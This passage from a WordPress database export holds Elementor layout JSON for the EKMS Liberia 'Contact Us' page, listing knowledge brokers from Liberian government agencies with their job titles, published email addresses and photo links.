ayout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21863,3169,'_elementor_edit_mode','builder'),(21864,3169,'_elementor_template_type','wp-page'),(21865,3169,'_elementor_version','2.8.1'),(21866,3169,'_wp_page_template','default'),(21867,3169,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjami